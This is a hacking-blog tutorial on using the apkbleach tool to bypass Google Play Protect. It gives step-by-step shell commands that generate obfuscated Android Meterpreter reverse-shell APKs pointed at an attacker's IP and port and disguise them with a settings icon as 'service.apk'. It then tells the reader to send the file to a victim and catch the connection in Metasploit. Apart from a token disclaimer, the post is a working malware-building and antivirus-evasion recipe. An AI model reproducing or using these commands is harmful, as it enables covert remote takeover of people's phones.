How to bypass Google Play Protect with Apk Bleach

Most ways of hacking android devices as shown in our previous posts work really well. But since they work really well google has started to block them with the Google play protect service. It’s one of the default antivirus tools built into android but even that is not foolproof. So in this tutorial, we will show you how hackers can bypass Google play Protect and hack android devices:

Google Play Security and Antivirus (A.K.A Goole Play Protect):

Google Play Protect is Google Antivirus software that was developed to protect android devices. This shield is included by default on all the latest android phones who have the Google Play Store. The Play Protect blocks the install of any malicious app on android phones making the phones quite secure. Google Play Protect scans the device for malware and if any malware is detected it will warn you as shown in the image below:

Games provided on Google Play and even apps installed on your phone will be scanned and if a virus is detected then you will be alerted and reminded to remove the malicious software.

How to bypass Google Play Protect with Apk Bleach

Step 1: Open Kali Linux and type the following commands to clone and download the apkbleach tool on your system.

git clone https://github.com/graylagx2/apkbleach

Step 2: After downloading, open the Apk bleach tool folder and access the apkbleach file with the following command:

cd apkbleach

Now give the tool execution permission with the following Linux command:

chmod +x apkbleach

Step 3: Run the APKBleach tool with the following command:

./apkbleach

There are a lot of options that you can use to create this malicious file. You can see those options below:

 -g <android/payload/to/use LHOST=ip-address-to-use LPORT=port-to-use>
      Generates obfuscated payload with nops

  -i <path/to/image.png> [ use -i --list ] to list defaults
      Sets image as the icon of the file.apk

  -o  <path/to/outputname.apk>
      Sets the name of custom output file

  -x <path/to/apk>
      Uses pre generated metasploit payload to obfuscate

  -h  Help menu

Now I will create my own malicious file which will bypass google play protect.

./apkbleach -g android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -i ICONS/settings.png -o /root/Desktop/service.apk

After typing the above command, we wait for the tool to create a malicious file for us

After creating the malicious file, and sending it to the target victim we need to put Metasploit in listening mode and wait for the connection.

As you can see in the image below the malware file was not detected by Google play protect.

And thus we have successfully bypassed Google play protect security service.

You can use any of the below commands in APK Bleach to make the Maclious files:

./apkbleach -g android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444

 ./apkbleach -x /root/msf.apk

./apkbleach -g android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -i ICONS/settings.png 

./apkbleach -g android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -i ICONS/settings.png -o /var/www/html/service.apk

That’s all folks. This is how you can bypass the Google play Protect with apk bleach tool. Most antivirus out there still cannot detect these types of virus apps making them very vulnerable.Do note this post is only for educational purposes do not use these posts for any illegal or nefarious means. Hacking World team only supports ethical hacking and pen-testing.